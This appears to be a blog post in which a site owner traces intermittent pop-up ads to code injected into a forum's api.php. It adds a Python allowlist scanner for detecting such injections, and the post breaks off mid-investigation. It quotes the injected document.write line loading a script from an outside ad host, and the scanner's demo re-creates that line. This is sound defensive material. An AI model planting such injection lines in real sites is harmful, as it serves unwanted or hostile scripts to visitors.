Last December, some friends told me that a pop-up appeared when they opened my website. Because the site's home page files had been injected with malicious code once before, I deliberately opened the site and read through the source code for anything suspicious, but found nothing. I asked my friends whether the pop-up appeared every time. They said, "not every time, but occasionally," so I concluded that it was advertising injected through DNS hijacking by the telecom operator. Shortly afterwards, Peng Peng, a team partner in Beijing, asked me why a game advertisement sometimes popped up when the home page was opened. This time I was sure malicious code had been planted on the site. I went through the page source carefully again and finally found the traces. The malicious code did exist, but not in the web page files. It was in a PHP file that is called to supply data, api.php under the forum on the second-level domain, where the following malicious code had been written:
document.write("<script src=http://s.ad.nu99.com/ip.asp; loc=zibo></script>");
This file is then loaded whenever the main site calls it, and the trailing zibo is exactly why I never saw the advertising pop-up while I was in Zibo.
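An added example, not part of the original post: because the injected line sat in a server-side data file rather than in the page itself, and was not shown to every visitor, scanning the files on the server for script hosts outside an allowlist is more reliable than reading the rendered source. The allowlist hosts, the file suffixes and the bbs/ directory name are assumptions, and the sample files are constructed.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Hosts the site legitimately loads scripts from (assumed placeholder values).
ALLOWED_HOSTS = {"www.example.com", "bbs.example.com"}
# Anything that can emit markup, including server-side "data" endpoints.
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js", ".asp", ".inc"}

# Matches quoted, escaped-quote and unquoted src values, absolute or //host form.
SCRIPT_SRC = re.compile(
    r"<\s*script\b[^>]*?\bsrc\s*=\s*\\?[\"']?\s*((?:https?:)?//[^\s\"'>;\\]+)",
    re.IGNORECASE,
)

def external_script_hosts(text):
    """Return the host of every absolute script src URL found in text."""
    hosts = (urlparse(url).hostname for url in SCRIPT_SRC.findall(text))
    return [h for h in hosts if h]

def scan_webroot(root, allowed=ALLOWED_HOSTS):
    """Return (relative path, line number, host) for hosts not in the allowlist."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for no, line in enumerate(text.splitlines(), 1):
            for host in external_script_hosts(line):
                if host not in allowed:
                    findings.append((path.relative_to(root).as_posix(), no, host))
    return findings

def demo():
    """Scan a constructed web root: a clean home page plus an injected api.php."""
    with tempfile.TemporaryDirectory() as root:
        base = Path(root)
        (base / "bbs").mkdir()
        (base / "index.html").write_text(
            '<script src="http://www.example.com/js/main.js"></script>\n')
        (base / "bbs" / "api.php").write_text(
            "<?php\n"
            "echo 'document.write(\"<script src=http://s.ad.nu99.com/ip.asp;"
            " loc=zibo></script>\");';\n")
        return scan_webroot(base)

if __name__ == "__main__":
    print(demo())
```

Run against a real web root with `scan_webroot("/path/to/webroot")`; every finding is a file and line to review by hand.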
In May I went to Beijing to attend the Entrepreneurs Conference. Opening the website in my hotel room, I saw the advertising page pop up. A quick look at the page source showed nothing abnormal. I told myself I must find time to track the problem down properly, but afterwards I forgot about it.
Last week I visited a friend and, while showing him my website, suddenly saw the pop-up ads. This time I was sure malicious code had been inserted into the site and that I had to look for the cause carefully. This week was too busy and I almost forgot about it. Today the site was particularly slow, and in the morning it often would not open at all, so for safety I made a temporary data backup. After the backup I left a QQ message for the data center's customer service saying that the website was slow, but got no reply. In the afternoon the site opened slightly faster but was still noticeably slow, and a page took a few seconds to load. In those few seconds I noticed a domain name, ad.df77.com, in the browser status bar. The domain looked all too familiar, just like the earlier ad.nu99.com. This time I could not let this malicious code get away again; I had to pull it out.
The process: I checked the script code sections one by one and in the end found nothing. Then I thought of the capture tool in Chromium-based browsers. I opened the capture tool and refreshed the page, and the sources list below clearly shows every domain the page loads data from: